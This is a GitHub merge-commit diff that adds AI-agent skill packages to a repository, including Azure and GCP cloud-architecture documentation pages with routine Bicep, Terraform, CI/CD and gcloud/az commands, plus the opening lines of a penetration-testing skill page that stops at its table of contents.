Merge pull request #410 from alirezarezvani/dev

Dev
This commit is contained in:
Alireza Rezvani
2026-03-25 15:09:40 +01:00
committed by GitHub
85 changed files with 30230 additions and 23 deletions

View File

@@ -3,7 +3,7 @@
"name": "claude-code-skills",
"description": "Production-ready skill packages for AI agents - Marketing, Engineering, Product, C-Level, PM, and RA/QM",
"repository": "https://github.com/alirezarezvani/claude-skills",
"total_skills": 166,
"total_skills": 174,
"skills": [
{
"name": "contract-and-proposal-writer",
@@ -209,6 +209,12 @@
"category": "engineering",
"description": "Design AWS architectures for startups using serverless patterns and IaC templates. Use when asked to design serverless architecture, create CloudFormation templates, optimize AWS costs, set up CI/CD pipelines, or migrate to AWS. Covers Lambda, API Gateway, DynamoDB, ECS, Aurora, and cost optimization."
},
{
"name": "azure-cloud-architect",
"source": "../../engineering-team/azure-cloud-architect",
"category": "engineering",
"description": "Design Azure architectures for startups and enterprises. Use when asked to design Azure infrastructure, create Bicep/ARM templates, optimize Azure costs, set up Azure DevOps pipelines, or migrate to Azure. Covers AKS, App Service, Azure Functions, Cosmos DB, and cost optimization."
},
{
"name": "code-reviewer",
"source": "../../engineering-team/code-reviewer",
@@ -227,6 +233,12 @@
"category": "engineering",
"description": ">"
},
{
"name": "gcp-cloud-architect",
"source": "../../engineering-team/gcp-cloud-architect",
"category": "engineering",
"description": "Design GCP architectures for startups and enterprises. Use when asked to design Google Cloud infrastructure, deploy to GKE or Cloud Run, configure BigQuery pipelines, optimize GCP costs, or migrate to GCP. Covers Cloud Run, GKE, Cloud Functions, Cloud SQL, BigQuery, and cost optimization."
},
{
"name": "google-workspace-cli",
"source": "../../engineering-team/google-workspace-cli",
@@ -251,6 +263,12 @@
"category": "engineering",
"description": "Production-grade Playwright testing toolkit. Use when the user mentions Playwright tests, end-to-end testing, browser automation, fixing flaky tests, test migration, CI/CD testing, or test suites. Generate tests, fix flaky failures, migrate from Cypress/Selenium, sync with TestRail, run on BrowserStack. 55 templates, 3 agents, smart reporting."
},
{
"name": "security-pen-testing",
"source": "../../engineering-team/security-pen-testing",
"category": "engineering",
"description": "Use when the user asks to perform security audits, penetration testing, vulnerability scanning, OWASP Top 10 checks, or offensive security assessments. Covers static analysis, dependency scanning, secret detection, API security testing, and pen test report generation."
},
{
"name": "self-improving-agent",
"source": "../../engineering-team/self-improving-agent",
@@ -345,7 +363,7 @@
"name": "tdd-guide",
"source": "../../engineering-team/tdd-guide",
"category": "engineering",
"description": "Test-driven development skill for writing unit tests, generating test fixtures and mocks, analyzing coverage gaps, and guiding red-green-refactor workflows across Jest, Pytest, JUnit, Vitest, and Mocha. Use when the user asks to write tests, improve test coverage, practice TDD, generate mocks or stubs, or mentions testing frameworks like Jest, pytest, or JUnit. Handles test generation from source code, coverage report parsing (LCOV/JSON/XML), quality scoring, and framework conversion for TypeScript, JavaScript, Python, and Java projects."
"description": "Test-driven development skill for writing unit tests, generating test fixtures and mocks, analyzing coverage gaps, and guiding red-green-refactor workflows across Jest, Pytest, JUnit, Vitest, and Mocha. Use when the user asks to write tests, improve test coverage, practice TDD, generate mocks or stubs, or mentions testing frameworks like Jest, pytest, or JUnit."
},
{
"name": "tech-stack-evaluator",
@@ -389,6 +407,12 @@
"category": "engineering-advanced",
"description": "Autonomous experiment loop that optimizes any file by a measurable metric. Inspired by Karpathy's autoresearch. The agent edits a target file, runs a fixed evaluation, keeps improvements (git commit), discards failures (git reset), and loops indefinitely. Use when: user wants to optimize code speed, reduce bundle/image size, improve test pass rate, optimize prompts, improve content quality (headlines, copy, CTR), or run any measurable improvement loop. Requires: a target file, an evaluation command that outputs a metric, and a git repo."
},
{
"name": "browser-automation",
"source": "../../engineering/browser-automation",
"category": "engineering-advanced",
"description": "Use when the user asks to automate browser tasks, scrape websites, fill forms, capture screenshots, extract structured data from web pages, or build web automation workflows. NOT for testing \u2014 use playwright-pro for that."
},
{
"name": "changelog-generator",
"source": "../../engineering/changelog-generator",
@@ -515,6 +539,12 @@
"category": "engineering-advanced",
"description": "Runbook Generator"
},
{
"name": "secrets-vault-manager",
"source": "../../engineering/secrets-vault-manager",
"category": "engineering-advanced",
"description": "Use when the user asks to set up secret management infrastructure, integrate HashiCorp Vault, configure cloud secret stores (AWS Secrets Manager, Azure Key Vault, GCP Secret Manager), implement secret rotation, or audit secret access patterns."
},
{
"name": "skill-security-auditor",
"source": "../../engineering/skill-security-auditor",
@@ -527,6 +557,18 @@
"category": "engineering-advanced",
"description": "Skill Tester"
},
{
"name": "spec-driven-workflow",
"source": "../../engineering/spec-driven-workflow",
"category": "engineering-advanced",
"description": "Use when the user asks to write specs before code, define acceptance criteria, plan features before implementation, generate tests from specifications, or follow spec-first development practices."
},
{
"name": "sql-database-assistant",
"source": "../../engineering/sql-database-assistant",
"category": "engineering-advanced",
"description": "Use when the user asks to write SQL queries, optimize database performance, generate migrations, explore database schemas, or work with ORMs like Prisma, Drizzle, TypeORM, or SQLAlchemy."
},
{
"name": "tech-debt-tracker",
"source": "../../engineering/tech-debt-tracker",
@@ -1000,6 +1042,12 @@
"source": "../../ra-qm-team/risk-management-specialist",
"category": "ra-qm",
"description": "Medical device risk management specialist implementing ISO 14971 throughout product lifecycle. Provides risk analysis, risk evaluation, risk control, and post-production information analysis. Use when user mentions risk management, ISO 14971, risk analysis, FMEA, fault tree analysis, hazard identification, risk control, risk matrix, benefit-risk analysis, residual risk, risk acceptability, or post-market risk."
},
{
"name": "soc2-compliance",
"source": "../../ra-qm-team/soc2-compliance",
"category": "ra-qm",
"description": "Use when the user asks to prepare for SOC 2 audits, map Trust Service Criteria, build control matrices, collect audit evidence, perform gap analysis, or assess SOC 2 Type I vs Type II readiness."
}
],
"categories": {
@@ -1014,12 +1062,12 @@
"description": "Executive leadership and advisory skills"
},
"engineering": {
"count": 26,
"count": 29,
"source": "../../engineering-team",
"description": "Software engineering and technical skills"
},
"engineering-advanced": {
"count": 31,
"count": 35,
"source": "../../engineering",
"description": "Advanced engineering skills - agents, RAG, MCP, CI/CD, databases, observability"
},
@@ -1044,7 +1092,7 @@
"description": "Project management and Atlassian skills"
},
"ra-qm": {
"count": 12,
"count": 13,
"source": "../../ra-qm-team",
"description": "Regulatory affairs and quality management skills"
}

View File

@@ -0,0 +1 @@
../../engineering-team/azure-cloud-architect

View File

@@ -0,0 +1 @@
../../engineering/browser-automation

View File

@@ -0,0 +1 @@
../../engineering-team/gcp-cloud-architect

View File

@@ -0,0 +1 @@
../../engineering/secrets-vault-manager

View File

@@ -0,0 +1 @@
../../engineering-team/security-pen-testing

View File

@@ -0,0 +1 @@
../../ra-qm-team/soc2-compliance

View File

@@ -0,0 +1 @@
../../engineering/spec-driven-workflow

View File

@@ -0,0 +1 @@
../../engineering/sql-database-assistant

View File

@@ -0,0 +1,462 @@
---
title: "Azure Cloud Architect — Agent Skill & Codex Plugin"
description: "Design Azure architectures for startups and enterprises. Use when asked to design Azure infrastructure, create Bicep/ARM templates, or optimize Azure costs. Agent skill for Claude Code, Codex CLI, Gemini CLI, OpenClaw."
---
# Azure Cloud Architect
<div class="page-meta" markdown>
<span class="meta-badge">:material-code-braces: Engineering - Core</span>
<span class="meta-badge">:material-identifier: `azure-cloud-architect`</span>
<span class="meta-badge">:material-github: <a href="https://github.com/alirezarezvani/claude-skills/tree/main/engineering-team/azure-cloud-architect/SKILL.md">Source</a></span>
</div>
<div class="install-banner" markdown>
<span class="install-label">Install:</span> <code>claude /plugin install engineering-skills</code>
</div>
Design scalable, cost-effective Azure architectures for startups and enterprises with Bicep infrastructure-as-code templates.
---
## Workflow
### Step 1: Gather Requirements
Collect application specifications:
```
- Application type (web app, mobile backend, data pipeline, SaaS, microservices)
- Expected users and requests per second
- Budget constraints (monthly spend limit)
- Team size and Azure experience level
- Compliance requirements (GDPR, HIPAA, SOC 2, ISO 27001)
- Availability requirements (SLA, RPO/RTO)
- Region preferences (data residency, latency)
```
### Step 2: Design Architecture
Run the architecture designer to get pattern recommendations:
```bash
python scripts/architecture_designer.py \
--app-type web_app \
--users 10000 \
--requirements '{"budget_monthly_usd": 500, "compliance": ["SOC2"]}'
```
**Example output:**
```json
{
"recommended_pattern": "app_service_web",
"service_stack": ["App Service", "Azure SQL", "Front Door", "Key Vault", "Entra ID"],
"estimated_monthly_cost_usd": 280,
"pros": ["Managed platform", "Built-in autoscale", "Deployment slots"],
"cons": ["Less control than VMs", "Platform constraints", "Cold start on consumption plans"]
}
```
Select from recommended patterns:
- **App Service Web**: Front Door + App Service + Azure SQL + Redis Cache
- **Microservices on AKS**: AKS + Service Bus + Cosmos DB + API Management
- **Serverless Event-Driven**: Functions + Event Grid + Service Bus + Cosmos DB
- **Data Pipeline**: Data Factory + Synapse Analytics + Data Lake Storage + Event Hubs
See `references/architecture_patterns.md` for detailed pattern specifications.
**Validation checkpoint:** Confirm the recommended pattern matches the team's operational maturity and compliance requirements before proceeding to Step 3.
### Step 3: Generate IaC Templates
Create infrastructure-as-code for the selected pattern:
```bash
# Web app stack (Bicep)
python scripts/bicep_generator.py --arch-type web-app --output main.bicep
```
**Example Bicep output (core web app resources):**
```bicep
@description('The environment name')
param environment string = 'dev'
@description('The Azure region for resources')
param location string = resourceGroup().location
@description('The application name')
param appName string = 'myapp'
// App Service Plan
resource appServicePlan 'Microsoft.Web/serverfarms@2023-01-01' = {
name: '${environment}-${appName}-plan'
location: location
sku: {
name: 'P1v3'
tier: 'PremiumV3'
capacity: 1
}
properties: {
reserved: true // Linux
}
}
// App Service
resource appService 'Microsoft.Web/sites@2023-01-01' = {
name: '${environment}-${appName}-web'
location: location
properties: {
serverFarmId: appServicePlan.id
httpsOnly: true
siteConfig: {
linuxFxVersion: 'NODE|20-lts'
minTlsVersion: '1.2'
ftpsState: 'Disabled'
alwaysOn: true
}
}
identity: {
type: 'SystemAssigned'
}
}
// Azure SQL Database
resource sqlServer 'Microsoft.Sql/servers@2023-05-01-preview' = {
name: '${environment}-${appName}-sql'
location: location
properties: {
administrators: {
azureADOnlyAuthentication: true
}
minimalTlsVersion: '1.2'
}
}
resource sqlDatabase 'Microsoft.Sql/servers/databases@2023-05-01-preview' = {
parent: sqlServer
name: '${appName}-db'
location: location
sku: {
name: 'GP_S_Gen5_2'
tier: 'GeneralPurpose'
}
properties: {
autoPauseDelay: 60
minCapacity: json('0.5')
}
}
```
> Full templates including Front Door, Key Vault, Managed Identity, and monitoring are generated by `bicep_generator.py` and also available in `references/architecture_patterns.md`.
**Bicep is the recommended IaC language for Azure.** Prefer Bicep over ARM JSON templates: Bicep compiles to ARM JSON, has cleaner syntax, supports modules, and is first-party supported by Microsoft.
### Step 4: Review Costs
Analyze estimated costs and optimization opportunities:
```bash
python scripts/cost_optimizer.py \
--config current_resources.json \
--json
```
**Example output:**
```json
{
"current_monthly_usd": 2000,
"recommendations": [
{ "action": "Right-size SQL Database GP_S_Gen5_8 to GP_S_Gen5_2", "savings_usd": 380, "priority": "high" },
{ "action": "Purchase 1-year Reserved Instances for AKS node pools", "savings_usd": 290, "priority": "high" },
{ "action": "Move Blob Storage to Cool tier for objects >30 days old", "savings_usd": 65, "priority": "medium" }
],
"total_potential_savings_usd": 735
}
```
Output includes:
- Monthly cost breakdown by service
- Right-sizing recommendations
- Reserved Instance and Savings Plan opportunities
- Potential monthly savings
### Step 5: Configure CI/CD
Set up Azure DevOps Pipelines or GitHub Actions with Azure:
```yaml
# GitHub Actions — deploy Bicep to Azure
name: Deploy Infrastructure
on:
push:
branches: [main]
permissions:
id-token: write
contents: read
jobs:
deploy:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: azure/login@v2
with:
client-id: ${{ secrets.AZURE_CLIENT_ID }}
tenant-id: ${{ secrets.AZURE_TENANT_ID }}
subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }}
- uses: azure/arm-deploy@v2
with:
resourceGroupName: rg-myapp-dev
template: ./infra/main.bicep
parameters: environment=dev
```
```yaml
# Azure DevOps Pipeline
trigger:
branches:
include:
- main
pool:
vmImage: 'ubuntu-latest'
steps:
- task: AzureCLI@2
inputs:
azureSubscription: 'MyServiceConnection'
scriptType: 'bash'
scriptLocation: 'inlineScript'
inlineScript: |
az deployment group create \
--resource-group rg-myapp-dev \
--template-file infra/main.bicep \
--parameters environment=dev
```
### Step 6: Security Review
Validate security posture before production:
- **Identity**: Entra ID (Azure AD) with RBAC, Managed Identity for service-to-service auth — never store credentials in code
- **Secrets**: Key Vault for all secrets, certificates, and connection strings
- **Network**: NSGs on all subnets, Private Endpoints for PaaS services, Application Gateway with WAF
- **Encryption**: TLS 1.2+ in transit, Azure-managed or customer-managed keys at rest
- **Monitoring**: Microsoft Defender for Cloud enabled, Azure Policy for guardrails
- **Compliance**: Azure Policy assignments for SOC 2 / HIPAA / ISO 27001 initiatives
**If deployment fails:**
1. Check the deployment status:
```bash
az deployment group show \
--resource-group rg-myapp-dev \
--name main \
--query 'properties.error'
```
2. Review Activity Log for RBAC or policy errors.
3. Validate the Bicep template before deploying:
```bash
az bicep build --file main.bicep
az deployment group validate \
--resource-group rg-myapp-dev \
--template-file main.bicep
```
**Common failure causes:**
- RBAC permission errors — verify the deploying principal has Contributor on the resource group
- Resource provider not registered — run `az provider register --namespace Microsoft.Web`
- Naming conflicts — Azure resource names are often globally unique (storage accounts, web apps)
- Quota exceeded — request quota increase via Azure Portal > Subscriptions > Usage + quotas
---
## Tools
### architecture_designer.py
Generates architecture pattern recommendations based on requirements.
```bash
python scripts/architecture_designer.py \
--app-type web_app \
--users 50000 \
--requirements '{"budget_monthly_usd": 1000, "compliance": ["HIPAA"]}' \
--json
```
**Input:** Application type, expected users, JSON requirements
**Output:** Recommended pattern, service stack, cost estimate, pros/cons
### cost_optimizer.py
Analyzes Azure resource configurations for cost savings.
```bash
python scripts/cost_optimizer.py --config resources.json --json
```
**Input:** JSON file with current Azure resource inventory
**Output:** Recommendations for:
- Idle resource removal
- VM and database right-sizing
- Reserved Instance purchases
- Storage tier transitions
- Unused public IPs and load balancers
### bicep_generator.py
Generates Bicep template scaffolds from architecture type.
```bash
python scripts/bicep_generator.py --arch-type microservices --output main.bicep
```
**Output:** Production-ready Bicep templates with:
- Managed Identity (no passwords)
- Key Vault integration
- Diagnostic settings for Azure Monitor
- Network security groups
- Tags for cost allocation
---
## Quick Start
### Web App Architecture (< $100/month)
```
Ask: "Design an Azure web app for a startup with 5000 users"
Result:
- App Service (B1 Linux) for the application
- Azure SQL Serverless for relational data
- Azure Blob Storage for static assets
- Front Door (free tier) for CDN and routing
- Key Vault for secrets
- Estimated: $40-80/month
```
### Microservices on AKS ($500-2000/month)
```
Ask: "Design a microservices architecture on Azure for a SaaS platform with 50k users"
Result:
- AKS cluster with 3 node pools (system, app, jobs)
- API Management for gateway and rate limiting
- Cosmos DB for multi-model data
- Service Bus for async messaging
- Azure Monitor + Application Insights for observability
- Multi-zone deployment
```
### Serverless Event-Driven (< $200/month)
```
Ask: "Design an event-driven backend for processing orders"
Result:
- Azure Functions (Consumption plan) for compute
- Event Grid for event routing
- Service Bus for reliable messaging
- Cosmos DB for order data
- Application Insights for monitoring
- Estimated: $30-150/month depending on volume
```
### Data Pipeline ($300-1500/month)
```
Ask: "Design a data pipeline for ingesting 10M events/day"
Result:
- Event Hubs for ingestion
- Stream Analytics or Functions for processing
- Data Lake Storage Gen2 for raw data
- Synapse Analytics for warehouse
- Power BI for dashboards
```
---
## Input Requirements
Provide these details for architecture design:
| Requirement | Description | Example |
|-------------|-------------|---------|
| Application type | What you're building | SaaS platform, mobile backend |
| Expected scale | Users, requests/sec | 10k users, 100 RPS |
| Budget | Monthly Azure limit | $500/month max |
| Team context | Size, Azure experience | 3 devs, intermediate |
| Compliance | Regulatory needs | HIPAA, GDPR, SOC 2 |
| Availability | Uptime requirements | 99.9% SLA, 1hr RPO |
**JSON Format:**
```json
{
"application_type": "saas_platform",
"expected_users": 10000,
"requests_per_second": 100,
"budget_monthly_usd": 500,
"team_size": 3,
"azure_experience": "intermediate",
"compliance": ["SOC2"],
"availability_sla": "99.9%"
}
```
---
## Anti-Patterns
| Anti-Pattern | Why It Fails | Do This Instead |
|---|---|---|
| ARM JSON templates for new projects | Verbose, hard to read, no modules | Use Bicep — compiles to ARM, cleaner syntax |
| Storing secrets in App Settings | Secrets visible in portal, no rotation | Use Key Vault references in App Settings |
| Single large AKS node pool | Cannot optimize for different workloads | Use multiple node pools: system, app, jobs |
| Public endpoints on PaaS services | Exposed attack surface | Use Private Endpoints + VNet integration |
| Over-provisioning "just in case" | Wastes budget month one | Start small, use autoscale, right-size monthly |
| Shared resource groups for everything | Blast radius, RBAC nightmares | One resource group per environment per workload |
| No tagging strategy | Cannot track costs or ownership | Tag: environment, owner, cost-center, app-name |
| Using classic resources | Deprecated, limited features | Use ARM/Bicep resources exclusively |
---
## Output Formats
### Architecture Design
- Pattern recommendation with rationale
- Service stack diagram (ASCII)
- Monthly cost estimate and trade-offs
### IaC Templates
- **Bicep**: Recommended — first-party, module support, clean syntax
- **ARM JSON**: Generated from Bicep when needed
- **Terraform HCL**: Multi-cloud compatible using azurerm provider
### Cost Analysis
- Current spend breakdown with optimization recommendations
- Priority action list (high/medium/low) and implementation checklist
---
## Reference Documentation
| Document | Contents |
|----------|----------|
| `references/architecture_patterns.md` | 5 patterns: web app, microservices/AKS, serverless, data pipeline, multi-region |
| `references/service_selection.md` | Decision matrices for compute, database, storage, messaging, networking |
| `references/best_practices.md` | Naming conventions, tagging, RBAC, network security, monitoring, DR |

View File

@@ -0,0 +1,429 @@
---
title: "GCP Cloud Architect — Agent Skill & Codex Plugin"
description: "Design GCP architectures for startups and enterprises. Use when asked to design Google Cloud infrastructure, deploy to GKE or Cloud Run, or configure BigQuery pipelines. Agent skill for Claude Code, Codex CLI, Gemini CLI, OpenClaw."
---
# GCP Cloud Architect
<div class="page-meta" markdown>
<span class="meta-badge">:material-code-braces: Engineering - Core</span>
<span class="meta-badge">:material-identifier: `gcp-cloud-architect`</span>
<span class="meta-badge">:material-github: <a href="https://github.com/alirezarezvani/claude-skills/tree/main/engineering-team/gcp-cloud-architect/SKILL.md">Source</a></span>
</div>
<div class="install-banner" markdown>
<span class="install-label">Install:</span> <code>claude /plugin install engineering-skills</code>
</div>
Design scalable, cost-effective Google Cloud architectures for startups and enterprises with infrastructure-as-code templates.
---
## Workflow
### Step 1: Gather Requirements
Collect application specifications:
```
- Application type (web app, mobile backend, data pipeline, SaaS)
- Expected users and requests per second
- Budget constraints (monthly spend limit)
- Team size and GCP experience level
- Compliance requirements (GDPR, HIPAA, SOC 2)
- Availability requirements (SLA, RPO/RTO)
```
### Step 2: Design Architecture
Run the architecture designer to get pattern recommendations:
```bash
python scripts/architecture_designer.py --input requirements.json
```
**Example output:**
```json
{
"recommended_pattern": "serverless_web",
"service_stack": ["Cloud Storage", "Cloud CDN", "Cloud Run", "Firestore", "Identity Platform"],
"estimated_monthly_cost_usd": 30,
"pros": ["Low ops overhead", "Pay-per-use", "Auto-scaling", "No cold starts on Cloud Run min instances"],
"cons": ["Vendor lock-in", "Regional limitations", "Eventual consistency with Firestore"]
}
```
Select from recommended patterns:
- **Serverless Web**: Cloud Storage + Cloud CDN + Cloud Run + Firestore
- **Microservices on GKE**: GKE Autopilot + Cloud SQL + Memorystore + Cloud Pub/Sub
- **Serverless Data Pipeline**: Pub/Sub + Dataflow + BigQuery + Looker
- **ML Platform**: Vertex AI + Cloud Storage + BigQuery + Cloud Functions
See `references/architecture_patterns.md` for detailed pattern specifications.
**Validation checkpoint:** Confirm the recommended pattern matches the team's operational maturity and compliance requirements before proceeding to Step 3.
### Step 3: Estimate Cost
Analyze estimated costs and optimization opportunities:
```bash
python scripts/cost_optimizer.py --resources current_setup.json --monthly-spend 2000
```
**Example output:**
```json
{
"current_monthly_usd": 2000,
"recommendations": [
{ "action": "Right-size Cloud SQL db-custom-4-16384 to db-custom-2-8192", "savings_usd": 380, "priority": "high" },
{ "action": "Purchase 1-yr committed use discount for GKE nodes", "savings_usd": 290, "priority": "high" },
{ "action": "Move Cloud Storage objects >90 days to Nearline", "savings_usd": 75, "priority": "medium" }
],
"total_potential_savings_usd": 745
}
```
Output includes:
- Monthly cost breakdown by service
- Right-sizing recommendations
- Committed use discount opportunities
- Sustained use discount analysis
- Potential monthly savings
Use the [GCP Pricing Calculator](https://cloud.google.com/products/calculator) for detailed estimates.
### Step 4: Generate IaC
Create infrastructure-as-code for the selected pattern:
```bash
python scripts/deployment_manager.py --app-name my-app --pattern serverless_web --region us-central1
```
**Example Terraform HCL output (Cloud Run + Firestore):**
```hcl
terraform {
required_providers {
google = {
source = "hashicorp/google"
version = "~> 5.0"
}
}
}
provider "google" {
project = var.project_id
region = var.region
}
variable "project_id" {
description = "GCP project ID"
type = string
}
variable "region" {
description = "GCP region"
type = string
default = "us-central1"
}
variable "environment" {
description = "Deployment environment (e.g. dev, prod)"
type = string
default = "dev"
}
variable "app_name" {
description = "Application name used in resource names"
type = string
}
resource "google_cloud_run_v2_service" "api" {
name = "${var.environment}-${var.app_name}-api"
location = var.region
template {
containers {
image = "gcr.io/${var.project_id}/${var.app_name}:latest"
resources {
limits = {
cpu = "1000m"
memory = "512Mi"
}
}
env {
name = "FIRESTORE_PROJECT"
value = var.project_id
}
}
scaling {
min_instance_count = 0
max_instance_count = 10
}
}
}
resource "google_firestore_database" "default" {
project = var.project_id
name = "(default)"
location_id = var.region
type = "FIRESTORE_NATIVE"
}
```
**Example gcloud CLI deployment:**
```bash
# Deploy Cloud Run service
gcloud run deploy my-app-api \
--image gcr.io/$PROJECT_ID/my-app:latest \
--region us-central1 \
--platform managed \
--allow-unauthenticated \
--memory 512Mi \
--cpu 1 \
--min-instances 0 \
--max-instances 10
# Create Firestore database
gcloud firestore databases create --location=us-central1
```
> Full templates including Cloud CDN, Identity Platform, IAM, and Cloud Monitoring are generated by `deployment_manager.py` and also available in `references/architecture_patterns.md`.
### Step 5: Configure CI/CD
Set up automated deployment with Cloud Build or GitHub Actions:
```yaml
# cloudbuild.yaml
steps:
- name: 'gcr.io/cloud-builders/docker'
args: ['build', '-t', 'gcr.io/$PROJECT_ID/my-app:$COMMIT_SHA', '.']
- name: 'gcr.io/cloud-builders/docker'
args: ['push', 'gcr.io/$PROJECT_ID/my-app:$COMMIT_SHA']
- name: 'gcr.io/google.com/cloudsdktool/cloud-sdk'
entrypoint: gcloud
args:
- 'run'
- 'deploy'
- 'my-app-api'
- '--image=gcr.io/$PROJECT_ID/my-app:$COMMIT_SHA'
- '--region=us-central1'
- '--platform=managed'
images:
- 'gcr.io/$PROJECT_ID/my-app:$COMMIT_SHA'
```
```bash
# Connect repo and create trigger
gcloud builds triggers create github \
--repo-name=my-app \
--repo-owner=my-org \
--branch-pattern="^main$" \
--build-config=cloudbuild.yaml
```
### Step 6: Security Review
Verify security configuration:
```bash
# Review IAM bindings
gcloud projects get-iam-policy $PROJECT_ID --format=json
# Check service account permissions
gcloud iam service-accounts list --project=$PROJECT_ID
# Verify VPC Service Controls (if applicable)
gcloud access-context-manager perimeters list --policy=$POLICY_ID
```
**Security checklist:**
- IAM roles follow least privilege (prefer predefined roles over basic roles)
- Service accounts use Workload Identity for GKE
- VPC Service Controls configured for sensitive APIs
- Cloud KMS encryption keys for customer-managed encryption
- Cloud Audit Logs enabled for all admin activity
- Organization policies restrict public access
- Secret Manager used for all credentials
**If deployment fails:**
1. Check the failure reason:
```bash
gcloud run services describe my-app-api --region us-central1
gcloud logging read "resource.type=cloud_run_revision" --limit=20
```
2. Review Cloud Logging for application errors.
3. Fix the configuration or container image.
4. Redeploy:
```bash
gcloud run deploy my-app-api --image gcr.io/$PROJECT_ID/my-app:latest --region us-central1
```
**Common failure causes:**
- IAM permission errors — verify service account roles and `--allow-unauthenticated` flag
- Quota exceeded — request quota increase via IAM & Admin > Quotas
- Container startup failure — check container logs and health check configuration
- Required APIs not enabled — enable them with `gcloud services enable`
---
## Tools
### architecture_designer.py
Recommends GCP services based on workload requirements.
```bash
python scripts/architecture_designer.py --input requirements.json --output design.json
```
**Input:** JSON with app type, scale, budget, compliance needs
**Output:** Recommended pattern, service stack, cost estimate, pros/cons
### cost_optimizer.py
Analyzes GCP resources for cost savings.
```bash
python scripts/cost_optimizer.py --resources inventory.json --monthly-spend 5000
```
**Output:** Recommendations for:
- Idle resource removal
- Machine type right-sizing
- Committed use discounts
- Storage class transitions
- Network egress optimization
### deployment_manager.py
Generates gcloud CLI deployment scripts and Terraform configurations.
```bash
python scripts/deployment_manager.py --app-name my-app --pattern serverless_web --region us-central1
```
**Output:** Production-ready deployment scripts with:
- Cloud Run or GKE deployment
- Firestore or Cloud SQL setup
- Identity Platform configuration
- IAM roles with least privilege
- Cloud Monitoring and Logging
---
## Quick Start
### Web App on Cloud Run (< $100/month)
```
Ask: "Design a serverless web backend for a mobile app with 1000 users"
Result:
- Cloud Run for API (auto-scaling, no cold start with min instances)
- Firestore for data (pay-per-operation)
- Identity Platform for authentication
- Cloud Storage + Cloud CDN for static assets
- Estimated: $15-40/month
```
### Microservices on GKE ($500-2000/month)
```
Ask: "Design a scalable architecture for a SaaS platform with 50k users"
Result:
- GKE Autopilot for containerized workloads
- Cloud SQL (PostgreSQL) with read replicas
- Memorystore (Redis) for session caching
- Cloud CDN for global delivery
- Cloud Build for CI/CD
- Multi-zone deployment
```
### Serverless Data Pipeline
```
Ask: "Design a real-time analytics pipeline for event data"
Result:
- Pub/Sub for event ingestion
- Dataflow (Apache Beam) for stream processing
- BigQuery for analytics and warehousing
- Looker for dashboards
- Cloud Functions for lightweight transforms
```
### ML Platform
```
Ask: "Design a machine learning platform for model training and serving"
Result:
- Vertex AI for training and prediction
- Cloud Storage for datasets and model artifacts
- BigQuery for feature store
- Cloud Functions for preprocessing triggers
- Cloud Monitoring for model drift detection
```
---
## Input Requirements
Provide these details for architecture design:
| Requirement | Description | Example |
|-------------|-------------|---------|
| Application type | What you're building | SaaS platform, mobile backend |
| Expected scale | Users, requests/sec | 10k users, 100 RPS |
| Budget | Monthly GCP limit | $500/month max |
| Team context | Size, GCP experience | 3 devs, intermediate |
| Compliance | Regulatory needs | HIPAA, GDPR, SOC 2 |
| Availability | Uptime requirements | 99.9% SLA, 1hr RPO |
**JSON Format:**
```json
{
"application_type": "saas_platform",
"expected_users": 10000,
"requests_per_second": 100,
"budget_monthly_usd": 500,
"team_size": 3,
"gcp_experience": "intermediate",
"compliance": ["SOC2"],
"availability_sla": "99.9%"
}
```
---
## Output Formats
### Architecture Design
- Pattern recommendation with rationale
- Service stack diagram (ASCII)
- Monthly cost estimate and trade-offs
### IaC Templates
- **Terraform HCL**: Production-ready Google provider configs
- **gcloud CLI**: Scripted deployment commands
- **Cloud Build YAML**: CI/CD pipeline definitions
### Cost Analysis
- Current spend breakdown with optimization recommendations
- Priority action list (high/medium/low) and implementation checklist
---
## Reference Documentation
| Document | Contents |
|----------|----------|
| `references/architecture_patterns.md` | 6 patterns: serverless, GKE microservices, three-tier, data pipeline, ML platform, multi-region |
| `references/service_selection.md` | Decision matrices for compute, database, storage, messaging |
| `references/best_practices.md` | Naming, labels, IAM, networking, monitoring, disaster recovery |

View File

@@ -1,13 +1,13 @@
---
title: "Engineering - Core Skills — Agent Skills & Codex Plugins"
description: "41 engineering - core skills — engineering agent skill and Claude Code plugin for code generation, DevOps, architecture, and testing. Works with Claude Code, Codex CLI, Gemini CLI, and OpenClaw."
description: "44 engineering - core skills — engineering agent skill and Claude Code plugin for code generation, DevOps, architecture, and testing. Works with Claude Code, Codex CLI, Gemini CLI, and OpenClaw."
---
<div class="domain-header" markdown>
# :material-code-braces: Engineering - Core
<p class="domain-count">41 skills in this domain</p>
<p class="domain-count">44 skills in this domain</p>
</div>
@@ -29,6 +29,12 @@ description: "41 engineering - core skills — engineering agent skill and Claud
Design scalable, cost-effective AWS architectures for startups with infrastructure-as-code templates.
- **[Azure Cloud Architect](azure-cloud-architect.md)**
---
Design scalable, cost-effective Azure architectures for startups and enterprises with Bicep infrastructure-as-code te...
- **[Code Reviewer](code-reviewer.md)**
---
@@ -53,6 +59,12 @@ description: "41 engineering - core skills — engineering agent skill and Claud
You are now a world-class epic design expert. You build cinematic, immersive websites that feel premium and alive — u...
- **[GCP Cloud Architect](gcp-cloud-architect.md)**
---
Design scalable, cost-effective Google Cloud architectures for startups and enterprises with infrastructure-as-code t...
- **[Google Workspace CLI](google-workspace-cli.md)**
---
@@ -77,6 +89,12 @@ description: "41 engineering - core skills — engineering agent skill and Claud
Production-grade Playwright testing toolkit for AI coding agents.
- **[Security Penetration Testing](security-pen-testing.md)**
---
Hands-on offensive security testing skill for finding vulnerabilities before attackers do. This is NOT compliance che...
- **[Self-Improving Agent](self-improving-agent.md)** + 5 sub-skills
---

View File

@@ -0,0 +1,861 @@
---
title: "Security Penetration Testing — Agent Skill & Codex Plugin"
description: "Use when the user asks to perform security audits, penetration testing, vulnerability scanning, OWASP Top 10 checks, or offensive security. Agent skill for Claude Code, Codex CLI, Gemini CLI, OpenClaw."
---
# Security Penetration Testing
<div class="page-meta" markdown>
<span class="meta-badge">:material-code-braces: Engineering - Core</span>
<span class="meta-badge">:material-identifier: `security-pen-testing`</span>
<span class="meta-badge">:material-github: <a href="https://github.com/alirezarezvani/claude-skills/tree/main/engineering-team/security-pen-testing/SKILL.md">Source</a></span>
</div>
<div class="install-banner" markdown>
<span class="install-label">Install:</span> <code>claude /plugin install engineering-skills</code>
</div>
Hands-on offensive security testing skill for finding vulnerabilities before attackers do. This is NOT compliance checking (see senior-secops) or security policy writing (see senior-security) — this is about systematic vulnerability discovery through authorized testing.
---
## Table of Contents
- [Overview](#overview)
